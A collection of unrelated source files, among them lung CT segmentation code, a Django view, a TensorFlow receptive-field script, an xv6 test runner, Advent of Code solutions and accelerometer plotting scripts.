10)] val_counts = sorted(val_counts, key=lambda x:-x[1])[:100] # sort by size body_counts = [c for _, c in val_counts] print val_counts binary = np.zeros_like(binary, dtype=np.uint8) print val_counts[0][0] binary[labels == val_counts[0][0]] = 1 #for v, _ in val_counts[0:5]: # binary[labels == v] = 1 if len(val_counts) > 1: if val_counts[1][1] * 3 > val_counts[0][1]: #binary[labels == val_counts[1][0]] = 1 #if val_counts[1][1] * 4 > val_counts[0][1]: logging.warn('more than 2 lungs parts detected') # remove upper part of qiguan last = binary.shape[0] - 1 for ri in range(binary.shape[0]): #H, W = sl.shape i = last - ri ll = measure.label(binary[i], background=0) # connected components nl = np.unique(ll) if len(nl) <= 2: binary[i,:,:] = 0 else: print 'removed %d slices' % ri break pass return binary, body_counts #, inside def convex_hull (binary): swap_sequence = [(0, 1), # 102 (0, 2), # 201 (0, 2)] # 102 output = np.ndarray(binary.shape, dtype=binary.dtype) for swp1, swp2 in swap_sequence: N = binary.shape[0] print 'shape', binary.shape for i in range(N): contours = measure.find_contours(binary[i], 0.5) if len(contours) == 0: continue if len(contours) == 1: contour = contours[0] else: contour = np.vstack(contours) cc = np.zeros_like(contour, dtype=np.int32) cc[:,0] = contour[:, 1] cc[:,1] = contour[:, 0] hull = cv2.convexHull(cc) contour = hull.reshape((1, -1, 2)) cv2.fillPoly(binary[i], contour, 1) #binary[i] = skimage.morphology.convex_hull_image(binary[i]) pass print 'swap', swp1, swp2 nb = np.swapaxes(binary, swp1, swp2) binary = np.ndarray(nb.shape, dtype=nb.dtype) binary[:,:] = nb[:,:] pass binary = np.swapaxes(binary, 0, 1) output[:,:] = binary[:,:] return output; #binary = binary_dilation(output, iterations=dilate) #return binary def segment_lung_internal (image, smooth=1, th=-300): padding_value = np.min(image) if padding_value < -1010: padding = [image == padding_value] else: padding = None imagex = image if padding: imagex = np.copy(image) imagex[padding] = 0 blur = scipy.ndimage.filters.gaussian_filter(imagex, smooth, mode='constant') if padding: blur[padding] = padding_value binary = np.array(blur < th, dtype=np.uint8) #not_slid = np.array(blur < th, dtype=np.uint8) not_solid = np.copy(binary) # body is a rough region covering human body body = np.zeros_like(binary) for 
i, sl in enumerate(binary): #H, W = sl.shape ll = measure.label(sl, background=1) # connected components # biggest CC should be body pp = measure.regionprops(ll) boxes = [(x.area, x.bbox, x.filled_image) for x in pp if x.label != 0] # label 0 is air boxes = sorted(boxes, key = lambda x: -x[0]) if len(boxes) == 0: print 'no body detected' continue y0, x0, y1, x1 = boxes[0][1] body[i,y0:y1,x0:x1] = fill_convex(boxes[0][2]) pass binary *= body if False: padding = np.min(image) if padding < -1010: binary[image == padding] = 0 # 0: body # 1: air & lung labels = measure.label(binary, background=1) # set air (same cc as corners) -> body bg_labels = set() # 8 corders of the image for z in [0, -1]: for y in [0, -1]: for x in [0, -1]: bg_labels.add(labels[z, y, x]) print bg_labels bg_labels = list(bg_labels) for bg_label in bg_labels: binary[bg_label == labels] = 0 pass # now binary: # 0: non-lung & body tissue in lung & air # 1: lung & holes in body #inside = np.copy(binary) # now binary: # 0: non-lung & body tissue in lung # 1: lung & holes in body binary = np.swapaxes(binary, 0, 1) for i, sl in enumerate(binary): #H, W = sl.shape ll = measure.label(sl, background=1) # connected components # biggest CC should be body vv, cc = np.unique(ll, return_counts=True) cc[0] = 0 assert len(vv) > 0 body_ll = vv[np.argmax(cc)] binary[i][ll != body_ll] = 1 pass binary = np.swapaxes(binary, 0, 1) if padding: binary[padding] = 0 binary *= body # binary 0: body # 1: - anything inside lung # - holes in body # - possibly image corners # # inside 0: non-lung & air # body tissue in lung # 1: lung # set corner again labels = measure.label(binary, background=0) bg_labels = set([0]) for z in [0, -1]: for y in [0, -1]: for x in [0, -1]: bg_labels.add(labels[z, y, x]) #print 'bg', bg_labels val_counts = zip(*np.unique(labels, return_counts=True)) val_counts = [x for x in val_counts if (not x[0] in bg_labels) and (x[1] >= 10)] val_counts = sorted(val_counts, key=lambda x:-x[1])[:100] # sort by size body_counts = [c for _, c in val_counts] print val_counts binary = np.zeros_like(binary, dtype=np.uint8) print val_counts[0][0] binary[labels == val_counts[0][0]] = 1 #for v, _ in val_counts[0:5]: # binary[labels == v] = 1 if len(val_counts) > 1: if val_counts[1][1] * 3 > val_counts[0][1]: #binary[labels == val_counts[1][0]] = 1 #if val_counts[1][1] * 4 > val_counts[0][1]: logging.warn('more than 2 lungs parts detected') # remove upper part of qiguan last = binary.shape[0] - 1 for ri in range(binary.shape[0]): #H, W = sl.shape i = last - ri ll = measure.label(binary[i], background=0) # connected components nl = np.unique(ll) if len(nl) <= 2: binary[i,:,:] = 0 else: print 'removed %d slices' % ri break pass #not_solid = np.logical_and(not_solid, binary) # solid within lung return np.logical_and(not_solid, binary), body_counts #, inside ```
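The `save_mask`/`load_mask` pair in `adsb3.py` earlier in this record stores a binary volume at one bit per voxel via `np.packbits`. The round-trip check below is an assumed usage example with trimmed re-implementations (not the originals) that illustrates the pack/unpack symmetry.
```python
import numpy as np

def save_mask(path, mask):  # same logic as adsb3.save_mask, trimmed for clarity
    total = mask.size
    padded = np.zeros(((total + 7) // 8 * 8,), dtype=np.uint8)
    padded[:total] = mask.reshape(-1)
    np.savez_compressed(path, np.array(mask.shape, dtype=np.uint32),
                        np.packbits(padded))

def load_mask(path):
    saved = np.load(path)
    shape, packed = saved['arr_0'], saved['arr_1']
    size = int(np.prod(shape))
    return np.unpackbits(packed)[:size].reshape(tuple(int(s) for s in shape))

mask = (np.random.rand(4, 5, 6) > 0.5).astype(np.uint8)
save_mask('mask.npz', mask)
assert np.array_equal(load_mask('mask.npz'), mask)
```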
{ "source": "aaalgo/seriescope", "score": 2 }
#### File: seriescope/web/views.py
```python
from django.shortcuts import render
from django.contrib.auth.decorators import login_required

# Create your views here.
@login_required
def viewer(request):
    #patient = Patient.objects.get(directory=key)
    user = request.user._wrapped.__dict__
    '''
    patient_id = request.GET.get('patient_id', -1)
    #print(user)
    del user['_state']
    del user['last_login']
    del user['date_joined']
    context = {'fix_patient_id': patient_id, 'user': user }
    '''
    context = {}
    return render(request, 'web/viewer.html', context)
```
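A hypothetical `urls.py` entry (not part of the original app, shown only as a usage sketch) for wiring the login-protected `viewer` view into a Django URLconf:
```python
from django.urls import path
from web import views  # assumes the app package is named "web", as in the file path

urlpatterns = [
    path('viewer/', views.viewer, name='viewer'),
]
```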
{ "source": "aaalgo/streamer", "score": 3 }
#### File: aaalgo/streamer/test.py
```python
import sys
sys.path.append('build/lib.linux-x86_64-' + sys.version[:3])
import cpp

def generator():
    for i in range(1000):
        yield i

stream = cpp.Streamer(generator(), 4)
while True:
    v = next(stream)
    if v is None:
        break
    print(v)
```
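For reference, a pure-Python sketch of the behaviour this test expects from the compiled `cpp.Streamer` extension: wrap a generator, prefetch up to `depth` items on a background thread, and yield `None` once the generator is exhausted. This is an illustrative stand-in, not the actual C++ implementation.
```python
import queue
import threading

class PyStreamer:
    _END = object()

    def __init__(self, gen, depth):
        self._q = queue.Queue(maxsize=depth)
        threading.Thread(target=self._fill, args=(gen,), daemon=True).start()

    def _fill(self, gen):
        for item in gen:
            self._q.put(item)
        self._q.put(self._END)

    def __next__(self):
        item = self._q.get()
        return None if item is self._END else item

stream = PyStreamer((i for i in range(5)), depth=2)
while True:
    v = next(stream)
    if v is None:
        break
    print(v)
```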
{ "source": "aaalgo/tfgraph", "score": 2 }
#### File: aaalgo/tfgraph/rfsize.py ```python from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import sys os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' import time import logging import argparse from toposort import toposort import tensorflow as tf class TFGraph(object): def __init__ (self, model): graph = tf.Graph() params = {} deps = {} with graph.as_default(): saver = tf.train.import_meta_graph(model + '.meta') graph_def = graph.as_graph_def() saver = tf.train.Saver() init = tf.global_variables_initializer() config = tf.ConfigProto() config.gpu_options.allow_growth=True with tf.Session(config=config) as sess: sess.run(init) saver.restore(sess, model) # scan the nodes for node in graph_def.node: name = node.name deps[name] = set(node.input) if 'Backprop' in name: # skip backprop ones continue if 'gradients' in name: continue attr = {} for key in ['padding', 'ksize', 'strides']: if key in node.attr: attr[key] = node.attr[key] if (not ('ksize' in attr)) and len(attr) == 2: # it's likely we have ve hit a Conv2D op, try to find ksize by # actually loading the weighting if len(node.input) < 2 or not ('/read' in node.input[1]): print(node.name) print(node.op) print(node.input) raise Exception('xx') W_name = node.input[1] + ':0' W = graph.get_tensor_by_name(W_name) w, = sess.run([W]) K1, K2, _, _ = w.shape attr['ksize'] = [1, K1, K2, 1] elif 'ksize' in attr: attr['ksize'] = [int(i) for i in attr['ksize'].list.i] if 'padding' in attr: attr['padding'] = attr['padding'].s if 'strides' in attr: attr['strides'] = [int(i) for i in attr['strides'].list.i] if not (len(attr) == 0 or len(attr) == 3): print("node %s of type %s is funny, we cannot support it!" % (node.name, node.op)) print(attr) sys.exit(1) pass if len(attr) != 3: continue attr['op'] = node.op params[name] = attr pass pass pass self.params = params self.deps = deps pass def sort_convlike (self): v = [] for group in toposort(self.deps): group = [x for x in group if x in self.params] if len(group) > 2: logging.error('non-serial graph, groups=%s' % group) raise Except() if len(group) == 0: continue name = group[0] param = self.params[name] #print('%s: %s' % (name, param['op'])) ksize = param['ksize'] strides = param['strides'] padding = param['padding'] #print('\tksize=%s, strides=%s, padding=%s' % (ksize, strides, padding)) v.append((name, param['op'], ksize, strides, padding)) return v pass if __name__ == '__main__': parser = argparse.ArgumentParser(prog='PROG') parser.add_argument('--model', default='model/20000', help='model') args = parser.parse_args() graph = TFGraph(args.model) ops = graph.sort_convlike() ops.reverse() rf = 1 not_started = True for name, op, ksize, strides, padding in ops: assert op in ['Conv2DBackpropInput', 'Conv2D', 'MaxPool'] if op == 'Conv2DBackpropInput': assert not_started continue not_started = False _, K1, K2, _ = ksize _, S1, S2, _ = strides print('%s: %s ksize=%s stride=%s => %d' % ( name, op, K1, S1, rf)) assert K1 == K2 assert S2 == S2 rf = (rf - 1) * S1 + K1 pass print("Receptive field: %d" % rf) ```
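The script above walks the conv-like ops in reverse and applies the standard receptive-field recurrence `rf = (rf - 1) * stride + ksize`. A standalone worked example with a small, made-up layer stack (not read from any real checkpoint) shows the same arithmetic:
```python
layers = [           # (name, ksize, stride), listed from input to output
    ('conv1', 3, 1),
    ('pool1', 2, 2),
    ('conv2', 3, 1),
    ('pool2', 2, 2),
]

rf = 1
for name, k, s in reversed(layers):
    rf = (rf - 1) * s + k
    print('%s: ksize=%d stride=%d -> rf=%d' % (name, k, s, rf))

print('Receptive field: %d' % rf)   # 10 for this stack
```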
{ "source": "aaamber/cs537", "score": 2 }
#### File: cs537/4b/project4b.py ```python import sys, os, inspect import toolspath from testing import Xv6Test, Xv6Build curdir = os.path.realpath(os.path.dirname(inspect.getfile(inspect.currentframe()))) def get_description(name): cfile = os.path.join(curdir, 'tests', name+'.c') with open(cfile, 'r') as f: desc = f.readline() desc = desc.strip() desc = desc[2:] if desc[-2:] == '*/': desc = desc[:-2] return desc.strip() test_values = { 'clone': 9, 'clone2': 6, 'clone3': 3, 'badclone': 6, 'stack': 8, 'join': 9, 'join2': 6, 'join3': 3, 'join4': 3, 'thread': 10, 'thread2': 7, 'multi': 8, 'locks': 8, 'noexit': 7, 'size' : 7, } all_tests = [] build_test = Xv6Build for testname in test_values.keys(): members = { 'name': testname, 'tester': 'tests/' + testname + '.c', 'description': get_description(testname), 'timeout': 10, 'point_value' : test_values[testname] } newclass = type(testname, (Xv6Test,), members) all_tests.append(newclass) setattr(sys.modules[__name__], testname, newclass) class usertests(Xv6Test): name = 'usertests' tester = 'tests/usertests.c' description = get_description('usertests') timeout = 240 #all_tests.append(usertests) from testing.runtests import main main(build_test, all_tests) ```
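The harness above builds one test class per entry with `type(name, bases, members)` and registers it on the module via `setattr`. A minimal self-contained illustration of that pattern (the `BaseTest` class and the two demo entries are invented for the example):
```python
import sys

class BaseTest:
    def run(self):
        print('running %s (%s, %d pts)' % (self.name, self.description, self.point_value))

for name, points in {'clone': 9, 'join': 9}.items():
    members = {'name': name, 'description': 'demo', 'point_value': points}
    setattr(sys.modules[__name__], name, type(name, (BaseTest,), members))

clone().run()   # a class literally named "clone" now exists at module level
```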
{ "source": "aaa-ncnu-ie/card.io-iOS-source", "score": 2 }
#### File: string_scripts/swedish_chef/swedish_chef.py ```python import os import re import sys import subprocess # Use the official chef lex file # Compile from source each time path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'swedish_chef.l') COMPILE_CMD = "lex -o /tmp/swedish_chef.c {0} && cc /tmp/swedish_chef.c -o /tmp/swedish_chef -ll".format(path) subprocess.Popen(COMPILE_CMD, stdout=subprocess.PIPE, shell=True).wait() RUN_CMD = "/tmp/swedish_chef" def filter(text): """ >>> filter("Turn flash on.") 'Toorn flesh oon.' >>> filter("Cancel") 'Cuncel' >>> filter("card.io") 'cerd.iu' """ p = subprocess.Popen(RUN_CMD, stdout=subprocess.PIPE, stdin=subprocess.PIPE) stdout, stderr = p.communicate(input=text) return stdout if __name__ == "__main__": import doctest doctest.testmod() ```
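The `filter()` helper pipes text through the compiled lexer with `Popen.communicate`. Under Python 3 the pipes must be opened in text mode (or be fed bytes); the sketch below shows the same pattern with `tr` standing in for the `/tmp/swedish_chef` binary, so it is only an approximation of the original flow and assumes a Unix-like system.
```python
import subprocess

def filter_text(cmd, text):
    p = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                         universal_newlines=True)  # text mode for str in/out
    stdout, _ = p.communicate(input=text)
    return stdout

print(filter_text(['tr', 'a-z', 'A-Z'], 'Turn flash on.'))  # TURN FLASH ON.
```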
{ "source": "aaandri98/AdventOfCode2020", "score": 3 }
#### File: AdventOfCode2020/day13/main.py ```python import os import sys import time from utility.file_reader import read_file from utility.parser import convert_to_int def filter_values(val): return val.isnumeric() def part_1(value_list, timestamp=1000340): value_list = list(filter(filter_values, value_list.split(','))) value_list = convert_to_int(value_list) best = sys.maxsize to_return = 0 for idx in range(len(value_list)): if value_list[idx] - (timestamp % value_list[idx]) < best: to_return = value_list[idx] best = value_list[idx] - (timestamp % value_list[idx]) return best * to_return def part_2(value_list, timestamp=1000340): value_list = (value_list.split(',')) okay = False counter = value_list[0] while not okay: for idx, val in enumerate(value_list): if val is not 'x': return okay = True return if __name__ == '__main__': dir_path = os.path.dirname(os.path.realpath(__file__)) input_read = read_file(dir_path + "/" + "input1.txt", "\n") start_time = time.time() print('part 1:', part_1(input_read[1])) print("--- %s seconds ---" % (time.time() - start_time), "\n") start_time = time.time() print('part 2:', part_2(input_read[1])) print("--- %s seconds ---" % (time.time() - start_time), "\n") ``` #### File: AdventOfCode2020/day16/main.py ```python import math import numbers import os import re import sys import time from collections import defaultdict from utility.file_reader import read_file from utility.parser import convert_to_int fields = { 'departure location': lambda x: 25 <= x <= 80 or 90 <= x <= 961, 'departure station': lambda x: 41 <= x <= 133 or 148 <= x <= 968, 'departure platform': lambda x: 48 <= x <= 425 or 451 <= x <= 952, 'departure track': lambda x: 25 <= x <= 371 or 384 <= x <= 966, 'departure date': lambda x: 49 <= x <= 531 or 546 <= x <= 973, 'departure time': lambda x: 45 <= x <= 641 or 656 <= x <= 954, 'arrival location': lambda x: 43 <= x <= 357 or 364 <= x <= 969, 'arrival station': lambda x: 40 <= x <= 669 or 689 <= x <= 954, 'arrival platform': lambda x: 40 <= x <= 550 or 570 <= x <= 956, 'arrival track': lambda x: 49 <= x <= 854 or 863 <= x <= 953, 'class': lambda x: 48 <= x <= 601 or 614 <= x <= 964, 'duration': lambda x: 27 <= x <= 698 or 715 <= x <= 962, 'price': lambda x: 38 <= x <= 781 or 800 <= x <= 970, 'route': lambda x: 47 <= x <= 824 or 842 <= x <= 965, 'row': lambda x: 45 <= x <= 219 or 241 <= x <= 955, 'seat': lambda x: 47 <= x <= 388 or 401 <= x <= 954, 'train': lambda x: 42 <= x <= 906 or 919 <= x <= 965, 'type': lambda x: 40 <= x <= 726 or 733 <= x <= 955, 'wagon': lambda x: 27 <= x <= 161 or 174 <= x <= 974, 'zone': lambda x: 48 <= x <= 103 or 110 <= x <= 954 } def part_1(value_list, scan_error=0): if len(value_list) == 0: return scan_error to_check = convert_to_int(value_list[0].split(',')) for val in range(len(to_check)): found = False for k in fields: if fields.get(k, lambda x: False)(to_check[val]): found = True break if not found: scan_error += to_check[val] return part_1(value_list[1:], scan_error) def part_2(value_list, value_list_parsed=None): if value_list_parsed is None: value_list_parsed = [] if len(value_list) == 0: final = [] for idx in range(len(value_list_parsed[0])): partial = [] for idx2 in range(len(value_list_parsed)): partial.append(value_list_parsed[idx2][idx]) final.append(partial) keys = defaultdict(list) for idx3 in range(len(final)): for k in fields: found = True for val in range(len(final[idx3])): if not fields.get(k, lambda x: False)(final[idx3][val]): found = False break if found: if not keys[idx3]: to_append = [] 
else: to_append = keys[idx3] keys[idx3] = [*to_append, k] has_finished = False already_done = [] while not has_finished: for k in keys: if k not in already_done and len(keys[k]) == 1: already_done.append(k) for k2 in keys: if k is not k2 and keys[k][0] in keys[k2]: keys[k2].remove(keys[k][0]) for k_idx in keys: if len(keys[k_idx]) > 1: has_finished = False break else: has_finished = True input_read = read_file(dir_path + "/" + "my.txt", ",") input_read = convert_to_int(input_read) total = 1 for k in keys: if 'departure' in keys[k][0]: total *= input_read[k] return total to_check = convert_to_int(value_list[0].split(',')) for val in range(len(to_check)): found = False for k in fields: if fields.get(k, lambda x: False)(to_check[val]): found = True break if not found: return part_2(value_list[1:], value_list_parsed) value_list_parsed.append(to_check) return part_2(value_list[1:], value_list_parsed) if __name__ == '__main__': dir_path = os.path.dirname(os.path.realpath(__file__)) input_read = read_file(dir_path + "/" + "nearby.txt", "\n") start_time = time.time() print('part 1:', part_1(input_read)) print("--- %s seconds ---" % (time.time() - start_time), "\n") start_time = time.time() print('part 2:', part_2(input_read)) print("--- %s seconds ---" % (time.time() - start_time), "\n") ``` #### File: AdventOfCode2020/day3/main.py ```python import os import time from utility.file_reader import read_file from utility.parser import convert_to_int def path_traversal(value_list, right_step, down_step): path_idx = 0 counter = 0 path_length = len(value_list[0]) for idx, value in enumerate(value_list): if idx % down_step == 0: single_path = value tree_or_space = single_path[path_idx] if tree_or_space == '#': counter += 1 path_idx += right_step if path_idx >= path_length: path_idx = path_idx % path_length return counter def part_1(value_list): right_3_down_1 = path_traversal(value_list, 3, 1) return right_3_down_1 def part_2(value_list): right_1_down_1 = path_traversal(value_list, 1, 1) right_3_down_1 = path_traversal(value_list, 3, 1) right_5_down_1 = path_traversal(value_list, 5, 1) right_7_down_1 = path_traversal(value_list, 7, 1) right_1_down_2 = path_traversal(value_list, 1, 2) return right_1_down_1 * right_1_down_2 * right_3_down_1 * right_5_down_1 * right_7_down_1 if __name__ == '__main__': dir_path = os.path.dirname(os.path.realpath(__file__)) input_read = read_file(dir_path + "/" + "input1.txt") start_time = time.time() print('part 1:', part_1(input_read)) print("--- %s seconds ---" % (time.time() - start_time), "\n") start_time = time.time() print('part 2:', part_2(input_read)) print("--- %s seconds ---" % (time.time() - start_time), "\n") ``` #### File: AdventOfCode2020/day9/main.py ```python import math import os import re import time from utility.file_reader import read_file from utility.parser import convert_to_int from utility.search import binary_search_recursive def part_1(value_list): partial = value_list[:26] to_count = value_list[26] partial.sort() found = False for idx in range(len(partial)): diff = to_count - partial[idx] if binary_search_recursive(partial, diff, 0, len(partial) - 1) != -1: found = True break if found: return part_1(value_list[1:]) else: return to_count def part_2(value_list): counter = 0 idx = 0 while counter < 393911906: counter += value_list[idx] idx += 1 if counter == 393911906: partial = value_list[:idx] partial.sort() return partial[0] + partial[len(partial) - 1] else: return part_2(value_list[1:]) if __name__ == '__main__': dir_path = 
os.path.dirname(os.path.realpath(__file__)) input_read = read_file(dir_path + "/" + "input1.txt", "\n") input_read = convert_to_int(input_read) start_time = time.time() print('part 1:', part_1(input_read)) print("--- %s seconds ---" % (time.time() - start_time), "\n") start_time = time.time() print('part 2:', part_2(input_read)) print("--- %s seconds ---" % (time.time() - start_time), "\n") ```
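For `day9` part 2, the hard-coded target (393911906) is searched by restarting the prefix sum from every offset. A two-pointer sliding window finds the same contiguous range in a single pass; the sketch below is an alternative formulation, verified against the small example from the puzzle description rather than the real input.
```python
def find_weakness(values, target):
    lo, hi, total = 0, 0, 0
    while hi < len(values):
        if total < target:
            total += values[hi]
            hi += 1
        elif total > target:
            total -= values[lo]
            lo += 1
        else:
            window = values[lo:hi]
            return min(window) + max(window)
    return None

sample = [35, 20, 15, 25, 47, 40, 62, 55, 65, 95]
print(find_weakness(sample, 127))   # 15 + 47 = 62
```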
{ "source": "aaandri98/AdventOfCode2021", "score": 3 }
#### File: AdventOfCode2021/day7/main.py ```python import os import time from typing import Counter def convert_to_int(string_list): for i in range(len(string_list)): string_list[i] = int(string_list[i]) return string_list def read_file(file_path, optional_divider=None): f = open(file_path, "r") if optional_divider is not None: return f.read().split(optional_divider) else: return f.read().split() def part_1(value_list): list.sort(value_list) frequency = [] j = 0 while j < 1912: frequency.append(0) j += 1 for i in range(len(value_list)): frequency[value_list[i]] += 1 min_value = 1000000 for i in range(len(frequency)): current_value = 0 for j in range(len(frequency)): if j != i: current_value += frequency[j] * abs(j - i) if current_value < min_value: min_value = current_value return min_value def part_2(value_list): list.sort(value_list) frequency = [] j = 0 while j < 1912: frequency.append(0) j += 1 for i in range(len(value_list)): frequency[value_list[i]] += 1 min_value = 1000000000000000000 for i in range(len(frequency)): current_value = 0 for j in range(len(frequency)): if j != i: distance = abs(j - i) counter = 1 while counter <= distance: current_value += frequency[j] * counter counter += 1 if current_value < min_value: min_value = current_value return min_value if __name__ == '__main__': dir_path = os.path.dirname(os.path.realpath(__file__)) input_read = read_file(dir_path + "/" + "input1.txt", ",") value_list = convert_to_int(input_read) start_time = time.time() print("part 1: ", part_1(value_list)) print("--- %s seconds ---" % (time.time() - start_time), "\n") start_time = time.time() print("part 2: ", part_2(value_list)) print("--- %s seconds ---" % (time.time() - start_time), "\n") ```
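Part 2 above accumulates the triangular fuel cost with an inner counting loop. Since 1 + 2 + ... + d = d(d+1)/2, the same brute-force scan can use the closed form directly; the version below is an alternative sketch, checked against the published sample input (answer 168), not the real puzzle input.
```python
def part_2_closed_form(positions):
    lo, hi = min(positions), max(positions)
    def cost(target):
        return sum(abs(p - target) * (abs(p - target) + 1) // 2 for p in positions)
    return min(cost(t) for t in range(lo, hi + 1))

print(part_2_closed_form([16, 1, 2, 0, 4, 2, 7, 1, 2, 14]))   # 168
```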
{ "source": "aaanh/duplicated_accelcamp", "score": 3 }
#### File: src/deprecated/Pseudo.py ```python import matplotlib.pyplot as plt from modules.Tools import * #create variable to grab sample rate '''Add user time selection functionality''' def LoadRaw_1( fullPathName): # unpack makes it column-major block =np.loadtxt( fullPathName,dtype=float, comments= ";", delimiter=',', usecols=(0,1,2,3), unpack=True, skiprows=1) #current file is q1 #skipping 10 rows is device specific a= block[0:] #a[0] is time ix=0 iy=1 iz=2 return a def LoadRaw_2( fullPathName): ''' gets rid of ; stop ... in csv file completed with a comment argument''' # unpack makes it column-major block =np.loadtxt( fullPathName,dtype=float, comments= ";", delimiter=',', usecols=(0,1,2,3), unpack=True, skiprows=10) #current file is TopRight_Feb18 #skipping 10 rows is device specific a= block[0:] #a[0] is time ix=0 iy=1 iz=2 return a def LoadRaw_3( fullPathName): ''' gets rid of ; stop ... in csv file completed with a comment argument''' # unpack makes it column-major block =np.loadtxt( fullPathName,dtype=float, comments= ";", delimiter=',', usecols=(0,1,2,3), unpack=True, skiprows=9) #current file is TopRight_Feb18 #skipping 10 rows is device specific a= block[0:] #a[0] is time ix=0 iy=1 iz=2 return a ''' try: for i in : if i == "Time": LoadRaw_1 ''' '''after this the script should run perfectly, the LoadRaw function is the determining factor''' # -- open file -- myOpts = {} myOpts['initialfile'] = 'TopRight_Feb18.csv' '''Test file was TopRight_Feb18.csv''' fullPathName = dialogOpenFilename(myOpts) # for dev. purposes, skip dialog and use in-code filename #fName = "PythonTestData1.csv" #fullPathName = os.getcwd + "\\" + fName # b = LoadArray_GCEDCDblue(filename) # t= block[0] # # ax= block[1] # # ay= block[2] a = LoadRaw_3(fullPathName) times = a[0] print(a) '''Asks for outer radius''' try: Rdx = input("What was the Rdx in mm?") Rdy = input("What was the Rdy in mm?") Rdx_int = int(Rdx) Rdy_int = int(Rdy) print("Rdx is %s \nRdy is %s" %(Rdx, Rdy)) except ValueError: print("A number was not entered") Rdx = input("What was the Rdx?") Rdy = input("What was the Rdy?") '''Graphing ax vs t and ay vs t''' time = a[0] ax = a[1] ay = a[2] '''display graphs before user times''' avg_ax = np.average(ax) avg_ay = np.average(ay) print("The average acceleration in x is %s\nThe average acceleration in y is %s" %(avg_ax,avg_ay)) #plt.title('raw data: close window to show RMS analysis') plt.subplot(2,1,1) plt.plot(time,ax, label="Accel in x") plt.minorticks_on() plt.grid(b=True, which='both', color='0.65',linestyle='-') plt.xlabel("Time") plt.ylabel("Acceleration in x-direction") ax_mean = [np.mean(ax)]*len(time) ax_mean_line = plt.plot(time,ax_mean, label='Mean', linestyle='--') plt.legend(['Acceleration in x', 'Average in x']) plt.subplot(2,1,2) plt.subplots_adjust(hspace=0.3) plt.plot(time,ay, label='Accel in y') plt.minorticks_on() plt.grid(b=True, which='both', color='0.65',linestyle='-') plt.xlabel("Time") plt.ylabel("Acceleration in y-direction") ay_mean = [np.mean(ay)]*len(time) ay_mean_line = plt.plot(time,ay_mean, label='Mean', linestyle='--') plt.legend(['Acceleration in y', 'Average in y']) plt.ioff() plt.show() print("time") try: Start = input("Starting time") End = input("End time") Start_int = int(Start) End_int = int(End) print("Start is %s seconds\nEnd is %s seconds" %(Start, End)) except ValueError: print("A time was not entered") Start = input("Starting time") End = input("End time") '''user selected time''' n=0 avg_x = 0 avg_x_2 = 0 for i in range(len(time)): if( time[i]>Start_int 
and time[i]<End_int): avg_x += ax[i] n+=1 avg_x/=n print("avg and n ", avg_x, n) avg_x_2 = ax[(time>Start_int) & (time<End_int)].mean() print("method 1: " + str(avg_x)) print("method 2: " + str(avg_x_2)) ``` #### File: src/deprecated/xViewRawAccelData.py ```python import matplotlib.pyplot as plt from modules.Tools import * def zkXLabelTime(plt): plt.xlabel(r'$time \ t \ \left(s\right)$') def f(plt, string): plt.ylabel(r'$A_'+'z \ \left(m/s^2\right)$', fontweight='bold') x2 = r'$A_' + v + r'\ \left(m/s^2\right)$' #plt.ylabel(r'$A_x \ \left(m/s^2\right)$') plt.ylabel(x2) # -- open file -- myOpts = {} myOpts['title'] = 'Select CVS source file' myOpts['initialfile'] = 'PythonTestData1.csv' fullPathName = dialogOpenFilename(myOpts) a = LoadArray(fullPathName) az = a[2] # figsize is absolute size of individual plot figures #fig, ax = plt.subplots(num=None, figsize=(9, 4), dpi=80, facecolor='w', edgecolor='k') fig, ax = plt.subplots(num=None, dpi=80, facecolor='w', edgecolor='k') fig.canvas.set_window_title('3-axis raw accelerometer data') fig.suptitle('3-axis raw accelerometer data', fontsize=20) fig.set_size_inches(10,10) # absolute size of the frame # #ff5500ff plt.rc("font", size=16) #plt.rc("fontweight",'bold') plt.subplots_adjust(top = .85, bottom = .1 , hspace = .71) # top plt.subplot(3,1,1) zkXLabelTime(plt) zkYLabelAcceleration(plt,'x') #plt.xlabel(r'$time \ t \ \left(s\right)$') #f(plt,'d') s1 = "r'$A_" s2="x \ \left(m/s^2\right)$',fontweight='bold'" s3=s1+s2 x = r'$A_ \left(m/s^2\right)$' v='x' x2 = r'$A_' + v + r'\ \left(m/s^2\right)$' #plt.ylabel(r'$A_x \ \left(m/s^2\right)$') plt.ylabel(x2) plt.plot(a[0]) plt.subplot(3,1,2) zkXLabelTime(plt) plt.ylabel(r'$A_y \ \left(m/s^2\right)$',fontweight='bold') plt.plot(a[1]) plt.subplot(3,1,3) zkXLabelTime(plt) plt.plot(a[2]) plt.ylabel(r'$A_z \ \left(m/s^2\right)$',fontweight='bold') plt.show() c= diff(a) c=ediff ``` #### File: src/modules/Curvature.py ```python import numpy as np from modules.DataStructures import AccelData def GenADot(_AccelData:AccelData): """ Outputs an array of doubles that represents the first-order derivative of the acceleration data """ adot_list = np.array([]) dt = _AccelData.t[1]-_AccelData.t[0] for i in range(len(_AccelData.getSingleAxis(0))-1): # basically appends a new dy/dt to the list adot_list = np.array(list(adot_list)+[(_AccelData.getSingleAxis(1)[i+1]-_AccelData.getSingleAxis(1)[i])/dt]) return adot_list def Genyx2(_AccelData:AccelData): """does y*x^2 for the given data set""" olist = (np.square(_AccelData.getSingleAxis(0))*_AccelData.getSingleAxis(1))[:-1] return olist # double[] ``` #### File: src/modules/DataStructures.py ```python import numpy as np # this file to replace the current "DataStructures.py" ############# tools to catch type erros in ndarray structures ######### # type "vec3" is restrictively defined to be an ndarray of 3 doubles def isVec3( a : np.ndarray ) -> bool: if not isinstance(a,np.ndarray) : return False if len(np.shape(a)) != 1: return False if np.shape(a)[0] != 3: return False if a.dtype != np.double(999): return False return True def isArrayOfVec3( a : np.ndarray ) -> bool: if not isinstance(a, np.ndarray): return False if len(np.shape(a)) != 2: return False if not isVec3( a[0] ) : return False return True def assertIsArrayOfVec3( a : np.ndarray , context : str) -> None : assert isArrayOfVec3(a), context + ": elements of ndarray must be vec3, i.e. 
